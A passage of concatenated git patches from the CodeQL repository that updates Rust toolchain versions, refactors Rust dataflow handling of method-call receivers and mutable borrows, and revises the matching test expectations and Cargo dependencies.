repo::test;::from;Argument[0].Field[crate::option::MyOption::MySome(0)];ReturnValue.Field[crate::option::MyOption::MySome(0)].Reference;value;dfc-generated | +| Unexpected summary found: repo::test;::cloned;Argument[self].Field[crate::option::MyOption::MySome(0)].Reference;ReturnValue.Field[crate::option::MyOption::MySome(0)];value;dfc-generated | +| Unexpected summary found: repo::test;::get_or_insert;Argument[0];Argument[self].Field[crate::option::MyOption::MySome(0)];value;dfc-generated | +| Unexpected summary found: repo::test;::get_or_insert;Argument[self].Field[crate::option::MyOption::MySome(0)];ReturnValue.Reference;value;dfc-generated | +| Unexpected summary found: repo::test;::get_or_insert_default;Argument[self].Field[crate::option::MyOption::MySome(0)];ReturnValue.Reference;value;dfc-generated | +| Unexpected summary found: repo::test;::get_or_insert_with;Argument[self].Field[crate::option::MyOption::MySome(0)];ReturnValue.Reference;value;dfc-generated | +| Unexpected summary found: repo::test;::insert;Argument[self].Field[crate::option::MyOption::MySome(0)];ReturnValue.Reference;value;dfc-generated | +| Unexpected summary found: repo::test;::take_if;Argument[self].Field[crate::option::MyOption::MySome(0)];Argument[0].Parameter[0].Reference;value;dfc-generated | expectedModel From bb90b678a4979ef1c328bb6cd6448ed260f374ed Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 28 Feb 2025 10:43:48 +0100 Subject: [PATCH 039/892] Rust: update rust-specific toolchain --- rust/rust-toolchain.toml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rust/rust-toolchain.toml b/rust/rust-toolchain.toml index 60bdd6fbd0d8..1b61371a926c 100644 --- a/rust/rust-toolchain.toml +++ b/rust/rust-toolchain.toml @@ -3,6 +3,6 @@ # IMPORTANT: this can also have an impact on QL test results [toolchain] -channel = "1.84" +channel = "1.85" profile = "minimal" components = [ "clippy", "rustfmt", "rust-src" ] From 518f164c6167f9f57bcc54cafc874fceb9eca84d Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Fri, 28 Feb 2025 09:01:47 +0100 Subject: [PATCH 040/892] Rust: Address PR comments --- .../rust/dataflow/internal/DataFlowImpl.qll | 34 ++++++++----------- .../codeql/rust/dataflow/internal/SsaImpl.qll | 16 ++++----- .../dataflow/pointers/inline-flow.expected | 15 -------- .../library-tests/dataflow/pointers/main.rs | 6 ++-- 4 files changed, 25 insertions(+), 46 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index aacdf621ecee..4024f5974cf8 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -133,21 +133,21 @@ private predicate callToMethod(CallExpr call) { ) } -/** Holds if `arg` is an argument of `call` at the position `pos`. */ +/** + * Holds if `arg` is an argument of `call` at the position `pos`. + * + * Note that this does not hold for the receiever expression of a method call + * as the synthetic `ReceiverNode` is the argument for the `self` parameter. + */ private predicate isArgumentForCall(ExprCfgNode arg, CallExprBaseCfgNode call, ParameterPosition pos) { if callToMethod(call.(CallExprCfgNode).getCallExpr()) - then ( + then // The first argument is for the `self` parameter arg = call.getArgument(0) and pos.isSelf() or // Succeeding arguments are shifted left arg = call.getArgument(pos.getPosition() + 1) - ) else ( - // The self argument in a method call. - arg = call.(MethodCallExprCfgNode).getReceiver() and pos.isSelf() - or - arg = call.getArgument(pos.getPosition()) - ) + else arg = call.getArgument(pos.getPosition()) } /** @@ -370,11 +370,7 @@ module Node { private CallExprBaseCfgNode call_; private RustDataFlow::ArgumentPosition pos_; - ExprArgumentNode() { - isArgumentForCall(n, call_, pos_) and - // For receivers in method calls the `ReceiverNode` is the argument. - not call_.(MethodCallExprCfgNode).getReceiver() = n - } + ExprArgumentNode() { isArgumentForCall(n, call_, pos_) } override predicate isArgumentOf(DataFlowCall call, RustDataFlow::ArgumentPosition pos) { call.asCallBaseExprCfgNode() = call_ and pos = pos_ @@ -382,7 +378,7 @@ module Node { } /** - * The receiver of a method call _after_ any implicit borrow or dereferences + * The receiver of a method call _after_ any implicit borrow or dereferencing * has taken place. */ final class ReceiverNode extends ArgumentNode, TReceiverNode { @@ -400,7 +396,7 @@ module Node { override CfgScope getCfgScope() { result = n.getAstNode().getEnclosingCfgScope() } - override Location getLocation() { result = n.getLocation() } + override Location getLocation() { result = this.getReceiver().getLocation() } override string toString() { result = "receiver for " + this.getReceiver() } } @@ -559,7 +555,7 @@ module Node { override CfgScope getCfgScope() { result = n.getAstNode().getEnclosingCfgScope() } - override Location getLocation() { result = n.getLocation() } + override Location getLocation() { result = n.getReceiver().getLocation() } } final class SummaryPostUpdateNode extends FlowSummaryNode, PostUpdateNode { @@ -1050,7 +1046,7 @@ predicate lambdaCallExpr(CallExprCfgNode call, LambdaCallKind kind, ExprCfgNode } /** Holds if `mc` implicitly borrows its receiver. */ -predicate implicitBorrow(MethodCallExpr mc) { +private predicate implicitBorrow(MethodCallExpr mc) { // Determining whether an implicit borrow happens depends on the type of the // receiever as well as the target. As a heuristic we simply check if the // target takes `self` as a borrow and limit the approximation to cases where @@ -1060,7 +1056,7 @@ predicate implicitBorrow(MethodCallExpr mc) { } /** Holds if `mc` implicitly dereferences its receiver. */ -predicate implicitDeref(MethodCallExpr mc) { +private predicate implicitDeref(MethodCallExpr mc) { // Similarly to `implicitBorrow` this is an approximation. mc.getReceiver() instanceof VariableAccess and not mc.getStaticTarget().getParamList().getSelfParam().isRef() @@ -1727,7 +1723,7 @@ private module Cached { any(IndexExprCfgNode i).getBase(), any(FieldExprCfgNode access).getExpr(), any(TryExprCfgNode try).getExpr(), any(PrefixExprCfgNode pe | pe.getOperatorName() = "*").getExpr(), - any(AwaitExprCfgNode a).getExpr() + any(AwaitExprCfgNode a).getExpr(), any(MethodCallExprCfgNode mc).getReceiver() ] } or TReceiverNode(MethodCallExprCfgNode mc, Boolean isPost) or diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll index 36f9545f4e17..87a8d6c0b0bd 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll @@ -47,13 +47,6 @@ module SsaInput implements SsaImplCommon::InputSig { BasicBlock getABasicBlockSuccessor(BasicBlock bb) { result = bb.getASuccessor() } - /** - * A variable amenable to SSA construction. - * - * All immutable variables are amenable. Mutable variables are restricted to - * those that are not borrowed (either explicitly using `& mut`, or - * (potentially) implicit as borrowed receivers in a method call). - */ class SourceVariable = Variable; predicate variableWrite(BasicBlock bb, int i, SourceVariable v, boolean certain) { @@ -381,8 +374,13 @@ private module DataFlowIntegrationInput implements Impl::DataFlowIntegrationInpu } predicate allowFlowIntoUncertainDef(UncertainWriteDefinition def) { - exists(Variable v, BasicBlock bb, int i | - def.definesAt(v, bb, i) and mutablyBorrows(bb.getNode(i).getAstNode(), v) + exists(CfgNodes::CallExprBaseCfgNode call, Variable v, BasicBlock bb, int i | + def.definesAt(v, bb, i) and + mutablyBorrows(bb.getNode(i).getAstNode(), v) + | + call.getArgument(_) = bb.getNode(i) + or + call.(CfgNodes::MethodCallExprCfgNode).getReceiver() = bb.getNode(i) ) } diff --git a/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected b/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected index 3ed7b7502562..450d33d39986 100644 --- a/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected @@ -40,11 +40,6 @@ edges | main.rs:73:10:73:10 | [post] b [&ref] | main.rs:74:15:74:15 | b [&ref] | provenance | | | main.rs:73:14:73:23 | source(...) | main.rs:73:10:73:10 | [post] b [&ref] | provenance | | | main.rs:74:15:74:15 | b [&ref] | main.rs:74:14:74:15 | * ... | provenance | | -| main.rs:90:11:90:16 | [post] &mut a [&ref] | main.rs:90:16:90:16 | [post] a | provenance | | -| main.rs:90:16:90:16 | [post] a | main.rs:91:14:91:14 | a | provenance | | -| main.rs:90:21:90:30 | source(...) | main.rs:90:11:90:16 | [post] &mut a [&ref] | provenance | | -| main.rs:95:13:95:29 | mut to_be_cleared | main.rs:98:14:98:26 | to_be_cleared | provenance | | -| main.rs:95:33:95:42 | source(...) | main.rs:95:13:95:29 | mut to_be_cleared | provenance | | | main.rs:105:10:105:10 | [post] c [&ref] | main.rs:106:15:106:15 | c [&ref] | provenance | | | main.rs:105:14:105:23 | source(...) | main.rs:105:10:105:10 | [post] c [&ref] | provenance | | | main.rs:106:15:106:15 | c [&ref] | main.rs:106:14:106:15 | * ... | provenance | | @@ -178,13 +173,6 @@ nodes | main.rs:73:14:73:23 | source(...) | semmle.label | source(...) | | main.rs:74:14:74:15 | * ... | semmle.label | * ... | | main.rs:74:15:74:15 | b [&ref] | semmle.label | b [&ref] | -| main.rs:90:11:90:16 | [post] &mut a [&ref] | semmle.label | [post] &mut a [&ref] | -| main.rs:90:16:90:16 | [post] a | semmle.label | [post] a | -| main.rs:90:21:90:30 | source(...) | semmle.label | source(...) | -| main.rs:91:14:91:14 | a | semmle.label | a | -| main.rs:95:13:95:29 | mut to_be_cleared | semmle.label | mut to_be_cleared | -| main.rs:95:33:95:42 | source(...) | semmle.label | source(...) | -| main.rs:98:14:98:26 | to_be_cleared | semmle.label | to_be_cleared | | main.rs:105:10:105:10 | [post] c [&ref] | semmle.label | [post] c [&ref] | | main.rs:105:14:105:23 | source(...) | semmle.label | source(...) | | main.rs:106:14:106:15 | * ... | semmle.label | * ... | @@ -290,7 +278,6 @@ subpaths | main.rs:253:24:253:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:149:34:153:1 | { ... } | main.rs:253:14:253:33 | to_number(...) | | main.rs:255:24:255:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:149:34:153:1 | { ... } | main.rs:255:14:255:33 | to_number(...) | testFailures -| main.rs:255:14:255:33 | to_number(...) | Unexpected result: hasValueFlow=99 | #select | main.rs:20:14:20:14 | c | main.rs:17:17:17:26 | source(...) | main.rs:20:14:20:14 | c | $@ | main.rs:17:17:17:26 | source(...) | source(...) | | main.rs:24:14:24:14 | n | main.rs:28:19:28:28 | source(...) | main.rs:24:14:24:14 | n | $@ | main.rs:28:19:28:28 | source(...) | source(...) | @@ -298,8 +285,6 @@ testFailures | main.rs:53:14:53:15 | * ... | main.rs:51:17:51:26 | source(...) | main.rs:53:14:53:15 | * ... | $@ | main.rs:51:17:51:26 | source(...) | source(...) | | main.rs:59:33:59:34 | * ... | main.rs:57:22:57:31 | source(...) | main.rs:59:33:59:34 | * ... | $@ | main.rs:57:22:57:31 | source(...) | source(...) | | main.rs:74:14:74:15 | * ... | main.rs:73:14:73:23 | source(...) | main.rs:74:14:74:15 | * ... | $@ | main.rs:73:14:73:23 | source(...) | source(...) | -| main.rs:91:14:91:14 | a | main.rs:90:21:90:30 | source(...) | main.rs:91:14:91:14 | a | $@ | main.rs:90:21:90:30 | source(...) | source(...) | -| main.rs:98:14:98:26 | to_be_cleared | main.rs:95:33:95:42 | source(...) | main.rs:98:14:98:26 | to_be_cleared | $@ | main.rs:95:33:95:42 | source(...) | source(...) | | main.rs:106:14:106:15 | * ... | main.rs:105:14:105:23 | source(...) | main.rs:106:14:106:15 | * ... | $@ | main.rs:105:14:105:23 | source(...) | source(...) | | main.rs:113:14:113:15 | * ... | main.rs:112:25:112:34 | source(...) | main.rs:113:14:113:15 | * ... | $@ | main.rs:112:25:112:34 | source(...) | source(...) | | main.rs:175:14:175:34 | my_number.to_number(...) | main.rs:174:44:174:53 | source(...) | main.rs:175:14:175:34 | my_number.to_number(...) | $@ | main.rs:174:44:174:53 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/pointers/main.rs b/rust/ql/test/library-tests/dataflow/pointers/main.rs index b96246ff6c44..d7e28c9368f4 100644 --- a/rust/ql/test/library-tests/dataflow/pointers/main.rs +++ b/rust/ql/test/library-tests/dataflow/pointers/main.rs @@ -88,14 +88,14 @@ mod intraprocedural_mutable_borrows { let mut a = 1; sink(a); *(&mut a) = source(87); - sink(a); // $ hasValueFlow=87 + sink(a); // $ MISSING: hasValueFlow=87 } pub fn clear_through_borrow() { let mut to_be_cleared = source(34); let p = &mut to_be_cleared; *p = 0; - sink(to_be_cleared); // $ SPURIOUS: hasValueFlow=34 + sink(to_be_cleared); // variable is cleared } pub fn write_through_borrow_in_match(cond: bool) { @@ -252,7 +252,7 @@ mod interprocedural_mutable_borrows { (&mut my_number).set(source(99)); sink(to_number(my_number)); // $ hasValueFlow=99 (&mut my_number).set(0); - sink(to_number(my_number)); // SPURIOUS: hasValueFlow=99 + sink(to_number(my_number)); // $ SPURIOUS: hasValueFlow=99 } } From e0d4e5ea7f577046021e81e5c5c73c932c4b316f Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 28 Feb 2025 11:36:27 +0100 Subject: [PATCH 041/892] Rust: remove missing flow in test --- .../strings/inline-taint-flow.expected | 61 +++++++++++-------- .../library-tests/dataflow/strings/main.rs | 12 ++-- 2 files changed, 43 insertions(+), 30 deletions(-) diff --git a/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected b/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected index ee15de985dcd..c3f9e94239a5 100644 --- a/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected +++ b/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected @@ -1,8 +1,9 @@ models -| 1 | Summary: lang:alloc; ::from; Argument[0]; ReturnValue; value | -| 2 | Summary: lang:alloc; ::as_str; Argument[self]; ReturnValue; taint | -| 3 | Summary: lang:alloc; crate::fmt::format; Argument[0]; ReturnValue; taint | -| 4 | Summary: lang:core; crate::hint::must_use; Argument[0]; ReturnValue; value | +| 1 | Summary: lang:alloc; <_ as crate::string::ToString>::to_string; Argument[self]; ReturnValue; taint | +| 2 | Summary: lang:alloc; ::from; Argument[0]; ReturnValue; value | +| 3 | Summary: lang:alloc; ::as_str; Argument[self]; ReturnValue; taint | +| 4 | Summary: lang:alloc; crate::fmt::format; Argument[0]; ReturnValue; taint | +| 5 | Summary: lang:core; crate::hint::must_use; Argument[0]; ReturnValue; value | edges | main.rs:26:9:26:9 | s | main.rs:27:19:27:25 | s[...] | provenance | | | main.rs:26:13:26:22 | source(...) | main.rs:26:9:26:9 | s | provenance | | @@ -12,41 +13,46 @@ edges | main.rs:32:9:32:10 | s1 | main.rs:35:9:35:10 | s4 | provenance | | | main.rs:32:14:32:23 | source(...) | main.rs:32:9:32:10 | s1 | provenance | | | main.rs:35:9:35:10 | s4 | main.rs:38:10:38:11 | s4 | provenance | | -| main.rs:51:9:51:10 | s1 | main.rs:52:27:52:28 | s1 | provenance | | -| main.rs:51:14:51:29 | source_slice(...) | main.rs:51:9:51:10 | s1 | provenance | | -| main.rs:52:9:52:10 | s2 | main.rs:53:10:53:11 | s2 | provenance | | -| main.rs:52:14:52:29 | ...::from(...) | main.rs:52:9:52:10 | s2 | provenance | | -| main.rs:52:27:52:28 | s1 | main.rs:52:14:52:29 | ...::from(...) | provenance | MaD:1 | +| main.rs:51:6:51:7 | s1 | main.rs:52:24:52:25 | s1 | provenance | | +| main.rs:51:11:51:26 | source_slice(...) | main.rs:51:6:51:7 | s1 | provenance | | +| main.rs:52:6:52:7 | s2 | main.rs:53:7:53:8 | s2 | provenance | | +| main.rs:52:11:52:26 | ...::from(...) | main.rs:52:6:52:7 | s2 | provenance | | +| main.rs:52:24:52:25 | s1 | main.rs:52:11:52:26 | ...::from(...) | provenance | MaD:2 | +| main.rs:57:6:57:7 | s1 | main.rs:58:11:58:12 | s1 | provenance | | +| main.rs:57:11:57:26 | source_slice(...) | main.rs:57:6:57:7 | s1 | provenance | | +| main.rs:58:6:58:7 | s2 | main.rs:59:7:59:8 | s2 | provenance | | +| main.rs:58:11:58:12 | s1 | main.rs:58:11:58:24 | s1.to_string(...) | provenance | MaD:1 | +| main.rs:58:11:58:24 | s1.to_string(...) | main.rs:58:6:58:7 | s2 | provenance | | | main.rs:63:9:63:9 | s | main.rs:64:16:64:16 | s | provenance | | | main.rs:63:13:63:22 | source(...) | main.rs:63:9:63:9 | s | provenance | | -| main.rs:64:16:64:16 | s | main.rs:64:16:64:25 | s.as_str(...) | provenance | MaD:2 | +| main.rs:64:16:64:16 | s | main.rs:64:16:64:25 | s.as_str(...) | provenance | MaD:3 | | main.rs:68:9:68:9 | s | main.rs:70:34:70:61 | MacroExpr | provenance | | | main.rs:68:9:68:9 | s | main.rs:73:34:73:59 | MacroExpr | provenance | | | main.rs:68:13:68:22 | source(...) | main.rs:68:9:68:9 | s | provenance | | | main.rs:70:9:70:18 | formatted1 | main.rs:71:10:71:19 | formatted1 | provenance | | | main.rs:70:22:70:62 | ...::format(...) | main.rs:70:9:70:18 | formatted1 | provenance | | -| main.rs:70:34:70:61 | MacroExpr | main.rs:70:22:70:62 | ...::format(...) | provenance | MaD:3 | +| main.rs:70:34:70:61 | MacroExpr | main.rs:70:22:70:62 | ...::format(...) | provenance | MaD:4 | | main.rs:73:9:73:18 | formatted2 | main.rs:74:10:74:19 | formatted2 | provenance | | | main.rs:73:22:73:60 | ...::format(...) | main.rs:73:9:73:18 | formatted2 | provenance | | -| main.rs:73:34:73:59 | MacroExpr | main.rs:73:22:73:60 | ...::format(...) | provenance | MaD:3 | +| main.rs:73:34:73:59 | MacroExpr | main.rs:73:22:73:60 | ...::format(...) | provenance | MaD:4 | | main.rs:76:9:76:13 | width | main.rs:77:34:77:74 | MacroExpr | provenance | | | main.rs:76:17:76:32 | source_usize(...) | main.rs:76:9:76:13 | width | provenance | | | main.rs:77:9:77:18 | formatted3 | main.rs:78:10:78:19 | formatted3 | provenance | | | main.rs:77:22:77:75 | ...::format(...) | main.rs:77:9:77:18 | formatted3 | provenance | | -| main.rs:77:34:77:74 | MacroExpr | main.rs:77:22:77:75 | ...::format(...) | provenance | MaD:3 | +| main.rs:77:34:77:74 | MacroExpr | main.rs:77:22:77:75 | ...::format(...) | provenance | MaD:4 | | main.rs:82:9:82:10 | s1 | main.rs:86:18:86:25 | MacroExpr | provenance | | | main.rs:82:9:82:10 | s1 | main.rs:87:18:87:32 | MacroExpr | provenance | | | main.rs:82:14:82:23 | source(...) | main.rs:82:9:82:10 | s1 | provenance | | | main.rs:86:10:86:26 | res | main.rs:86:18:86:25 | { ... } | provenance | | | main.rs:86:18:86:25 | ...::format(...) | main.rs:86:10:86:26 | res | provenance | | | main.rs:86:18:86:25 | ...::must_use(...) | main.rs:86:10:86:26 | MacroExpr | provenance | | -| main.rs:86:18:86:25 | MacroExpr | main.rs:86:18:86:25 | ...::format(...) | provenance | MaD:3 | -| main.rs:86:18:86:25 | { ... } | main.rs:86:18:86:25 | ...::must_use(...) | provenance | MaD:4 | +| main.rs:86:18:86:25 | MacroExpr | main.rs:86:18:86:25 | ...::format(...) | provenance | MaD:4 | +| main.rs:86:18:86:25 | { ... } | main.rs:86:18:86:25 | ...::must_use(...) | provenance | MaD:5 | | main.rs:87:10:87:33 | res | main.rs:87:18:87:32 | { ... } | provenance | | | main.rs:87:18:87:32 | ...::format(...) | main.rs:87:10:87:33 | res | provenance | | | main.rs:87:18:87:32 | ...::must_use(...) | main.rs:87:10:87:33 | MacroExpr | provenance | | -| main.rs:87:18:87:32 | MacroExpr | main.rs:87:18:87:32 | ...::format(...) | provenance | MaD:3 | -| main.rs:87:18:87:32 | { ... } | main.rs:87:18:87:32 | ...::must_use(...) | provenance | MaD:4 | +| main.rs:87:18:87:32 | MacroExpr | main.rs:87:18:87:32 | ...::format(...) | provenance | MaD:4 | +| main.rs:87:18:87:32 | { ... } | main.rs:87:18:87:32 | ...::must_use(...) | provenance | MaD:5 | nodes | main.rs:26:9:26:9 | s | semmle.label | s | | main.rs:26:13:26:22 | source(...) | semmle.label | source(...) | @@ -58,12 +64,18 @@ nodes | main.rs:32:14:32:23 | source(...) | semmle.label | source(...) | | main.rs:35:9:35:10 | s4 | semmle.label | s4 | | main.rs:38:10:38:11 | s4 | semmle.label | s4 | -| main.rs:51:9:51:10 | s1 | semmle.label | s1 | -| main.rs:51:14:51:29 | source_slice(...) | semmle.label | source_slice(...) | -| main.rs:52:9:52:10 | s2 | semmle.label | s2 | -| main.rs:52:14:52:29 | ...::from(...) | semmle.label | ...::from(...) | -| main.rs:52:27:52:28 | s1 | semmle.label | s1 | -| main.rs:53:10:53:11 | s2 | semmle.label | s2 | +| main.rs:51:6:51:7 | s1 | semmle.label | s1 | +| main.rs:51:11:51:26 | source_slice(...) | semmle.label | source_slice(...) | +| main.rs:52:6:52:7 | s2 | semmle.label | s2 | +| main.rs:52:11:52:26 | ...::from(...) | semmle.label | ...::from(...) | +| main.rs:52:24:52:25 | s1 | semmle.label | s1 | +| main.rs:53:7:53:8 | s2 | semmle.label | s2 | +| main.rs:57:6:57:7 | s1 | semmle.label | s1 | +| main.rs:57:11:57:26 | source_slice(...) | semmle.label | source_slice(...) | +| main.rs:58:6:58:7 | s2 | semmle.label | s2 | +| main.rs:58:11:58:12 | s1 | semmle.label | s1 | +| main.rs:58:11:58:24 | s1.to_string(...) | semmle.label | s1.to_string(...) | +| main.rs:59:7:59:8 | s2 | semmle.label | s2 | | main.rs:63:9:63:9 | s | semmle.label | s | | main.rs:63:13:63:22 | source(...) | semmle.label | source(...) | | main.rs:64:16:64:16 | s | semmle.label | s | @@ -103,7 +115,8 @@ testFailures #select | main.rs:28:16:28:21 | sliced | main.rs:26:13:26:22 | source(...) | main.rs:28:16:28:21 | sliced | $@ | main.rs:26:13:26:22 | source(...) | source(...) | | main.rs:38:10:38:11 | s4 | main.rs:32:14:32:23 | source(...) | main.rs:38:10:38:11 | s4 | $@ | main.rs:32:14:32:23 | source(...) | source(...) | -| main.rs:53:10:53:11 | s2 | main.rs:51:14:51:29 | source_slice(...) | main.rs:53:10:53:11 | s2 | $@ | main.rs:51:14:51:29 | source_slice(...) | source_slice(...) | +| main.rs:53:7:53:8 | s2 | main.rs:51:11:51:26 | source_slice(...) | main.rs:53:7:53:8 | s2 | $@ | main.rs:51:11:51:26 | source_slice(...) | source_slice(...) | +| main.rs:59:7:59:8 | s2 | main.rs:57:11:57:26 | source_slice(...) | main.rs:59:7:59:8 | s2 | $@ | main.rs:57:11:57:26 | source_slice(...) | source_slice(...) | | main.rs:64:16:64:25 | s.as_str(...) | main.rs:63:13:63:22 | source(...) | main.rs:64:16:64:25 | s.as_str(...) | $@ | main.rs:63:13:63:22 | source(...) | source(...) | | main.rs:71:10:71:19 | formatted1 | main.rs:68:13:68:22 | source(...) | main.rs:71:10:71:19 | formatted1 | $@ | main.rs:68:13:68:22 | source(...) | source(...) | | main.rs:74:10:74:19 | formatted2 | main.rs:68:13:68:22 | source(...) | main.rs:74:10:74:19 | formatted2 | $@ | main.rs:68:13:68:22 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/strings/main.rs b/rust/ql/test/library-tests/dataflow/strings/main.rs index e34b0cdab4c1..01041e3df463 100644 --- a/rust/ql/test/library-tests/dataflow/strings/main.rs +++ b/rust/ql/test/library-tests/dataflow/strings/main.rs @@ -48,15 +48,15 @@ fn string_add_reference() { } fn string_from() { - let s1 = source_slice(36); - let s2 = String::from(s1); - sink(s2); // $ hasValueFlow=36 + let s1 = source_slice(36); + let s2 = String::from(s1); + sink(s2); // $ hasValueFlow=36 } fn string_to_string() { - let s1 = source_slice(22); - let s2 = s1.to_string(); - sink(s2); // $ MISSING: hasTaintFlow=22 + let s1 = source_slice(22); + let s2 = s1.to_string(); + sink(s2); // $ hasTaintFlow=22 } fn as_str() { From 6b34d3f4805a2f44684882d0a037b7e0e721cb2a Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 28 Feb 2025 12:26:03 +0100 Subject: [PATCH 042/892] Rust: add missing empty expected file --- .../generated/RecordField/RecordField_getExpr.expected | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.expected diff --git a/rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.expected b/rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.expected new file mode 100644 index 000000000000..e69de29bb2d1 From 0445d886c76f0179d5731199d5d7bcfe1e30984a Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 28 Feb 2025 12:39:37 +0100 Subject: [PATCH 043/892] QL for QL: update toolchain --- ql/Cargo.lock | 38 ++++++++++++++++++++++---------------- ql/Cargo.toml | 1 + ql/rust-toolchain.toml | 7 ------- 3 files changed, 23 insertions(+), 23 deletions(-) delete mode 100644 ql/rust-toolchain.toml diff --git a/ql/Cargo.lock b/ql/Cargo.lock index 853271e24e64..6632bf162eec 100644 --- a/ql/Cargo.lock +++ b/ql/Cargo.lock @@ -1,6 +1,6 @@ # This file is automatically @generated by Cargo. # It is not intended for manual editing. -version = 3 +version = 4 [[package]] name = "adler2" @@ -130,9 +130,9 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chrono" -version = "0.4.38" +version = "0.4.40" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a21f936df1771bf62b77f047b726c4625ff2e8aa607c01ec06e5a05bd8463401" +checksum = "1a7964611d71df112cb1730f2ee67324fcf4d0fc6606acbbe9bfe06df124637c" dependencies = [ "android-tzdata", "iana-time-zone", @@ -140,7 +140,7 @@ dependencies = [ "num-traits", "serde", "wasm-bindgen", - "windows-targets", + "windows-link", ] [[package]] @@ -337,9 +337,9 @@ checksum = "a246d82be1c9d791c5dfde9a2bd045fc3cbba3fa2b11ad558f27d01712f00569" [[package]] name = "flate2" -version = "1.0.34" +version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a1b589b4dc103969ad3cf85c950899926ec64300a1a46d76c03a6072957036f0" +checksum = "11faaf5a5236997af9848be0bef4db95824b1d534ebc64d0f0c6cf3e67bd38dc" dependencies = [ "crc32fast", "miniz_oxide", @@ -449,9 +449,9 @@ checksum = "78ca9ab1a0babb1e7d5695e3530886289c18cf2f87ec19a575a0abdce112e3a3" [[package]] name = "miniz_oxide" -version = "0.8.0" +version = "0.8.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e2d80299ef12ff69b16a84bb182e3b9df68b5a91574d3d4fa6e41b65deec4df1" +checksum = "8e3e04debbb59698c15bacbb6d93584a8c0ca9cc3213cb423d31f760d8843ce5" dependencies = [ "adler2", ] @@ -679,9 +679,9 @@ dependencies = [ [[package]] name = "tracing" -version = "0.1.40" +version = "0.1.41" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c3523ab5a71916ccf420eebdf5521fcef02141234bbc0b8a49f2fdc4544364ef" +checksum = "784e0ac535deb450455cbfa28a6f0df145ea1bb7ae51b821cf5e7927fdcfbdd0" dependencies = [ "pin-project-lite", "tracing-attributes", @@ -690,9 +690,9 @@ dependencies = [ [[package]] name = "tracing-attributes" -version = "0.1.27" +version = "0.1.28" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34704c8d6ebcbc939824180af020566b01a7c01f80641264eba0999f6c2b6be7" +checksum = "395ae124c09f9e6918a2310af6038fba074bcf474ac352496d5910dd59a2226d" dependencies = [ "proc-macro2", "quote", @@ -701,9 +701,9 @@ dependencies = [ [[package]] name = "tracing-core" -version = "0.1.32" +version = "0.1.33" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c06d3da6113f116aaee68e4d601191614c9053067f9ab7f6edbcb161237daa54" +checksum = "e672c95779cf947c5311f83787af4fa8fffd12fb27e4993211a84bdfd9610f9c" dependencies = [ "once_cell", "valuable", @@ -722,9 +722,9 @@ dependencies = [ [[package]] name = "tracing-subscriber" -version = "0.3.18" +version = "0.3.19" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ad0f048c97dbd9faa9b7df56362b8ebcaa52adb06b498c050d2f4e32f90a7a8b" +checksum = "e8189decb5ac0fa7bc8b96b7cb9b2701d60d48805aca84a238004d665fcc4008" dependencies = [ "matchers", "nu-ansi-term", @@ -897,6 +897,12 @@ dependencies = [ "windows-targets", ] +[[package]] +name = "windows-link" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6dccfd733ce2b1753b03b6d3c65edf020262ea35e20ccdf3e288043e6dd620e3" + [[package]] name = "windows-sys" version = "0.59.0" diff --git a/ql/Cargo.toml b/ql/Cargo.toml index 5e42fc8d5e50..3dca1c9fbca6 100644 --- a/ql/Cargo.toml +++ b/ql/Cargo.toml @@ -1,4 +1,5 @@ [workspace] +resolver = "2" members = [ "extractor", "buramu", diff --git a/ql/rust-toolchain.toml b/ql/rust-toolchain.toml deleted file mode 100644 index 699a593039b0..000000000000 --- a/ql/rust-toolchain.toml +++ /dev/null @@ -1,7 +0,0 @@ -# This file specifies the Rust version used to develop and test the QL -# extractor. It is set to the lowest version of Rust we want to support. - -[toolchain] -channel = "1.74" -profile = "minimal" -components = [ "rustfmt" ] \ No newline at end of file From 79e2a758d76f143cd1c3ed2829065ca3fd3bd968 Mon Sep 17 00:00:00 2001 From: Asger F Date: Mon, 10 Feb 2025 13:27:46 +0100 Subject: [PATCH 044/892] JS: Allow more kinds of expectation comments --- .../test/internal/InlineExpectationsTestImpl.qll | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git 